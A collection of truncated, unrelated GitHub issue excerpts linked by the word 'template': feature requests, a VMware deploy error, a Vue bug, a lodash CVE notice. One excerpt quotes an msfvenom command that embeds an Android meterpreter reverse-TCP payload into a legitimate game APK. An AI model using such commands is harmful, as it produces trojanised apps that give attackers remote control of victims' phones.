-
The existing external/EX channel type is getting a bit unwieldy and still lacks attachment support. We could introduce a new "custom" channel type which uses the same templates/expressions that users …
-
All operations currently pass all responses as string.
While this is useful for xml, html, and plain text payload where processing is handled at the next layer (e.g. ruby_aem), this is not necessaril…
-
The templates have often been a source of issue with this project--between being bundled with the final artifact (requiring a new release for a single change to be picked up) and the waterfall-style "…
-
_From @Shweta217 on Aug 07, 2020 10:15_
##### SUMMARY
Failed to find folder for vmware_content_deploy_template module when trying to provision new server from template using content libr…
-
I have run into a few situations where it would be very helpful to allow executing of a command rather than substitution of a variable when running a template (with the ability to use variables if pos…
-
sudo msfvenom -x LudoKing.apk -p android/meterpreter/reverse_tcp lhost=127.0.0.1 lport=4444 -o Ludo.apk
Using APK template: LudoKing.apk
[-] No platform was selected, choosing Msf::Module::Platform:…
-
**Describe the bug**
Whenever I click on a slide (and not drag) a borderbox is drawn around the slides placeholder. When I drag, the borderbox is not shown.
**Code**
Code:
'< template>
< v-…
-
## CVE-2019-10744 - Critical Severity Vulnerability
Vulnerable Libraries - lodash.mergewith-4.6.1.tgz, lodash-4.17.11.tgz, lodash.template-4.4.0.tgz
lodash.mergewith-4.6.1.tgz
The Lodash method `_…
-
#### Describe the bug
It looks like the generator cannot handle types that are referenced in other files. Declaring the type locally in the schemas section works perfectly, but not when declaring th…
-
I'd like to customize `HalFormsConfiguration` in order to be able to produce HAL-Forms options for some template payload properties via a home made annotation based engine.
My goal is to have somet…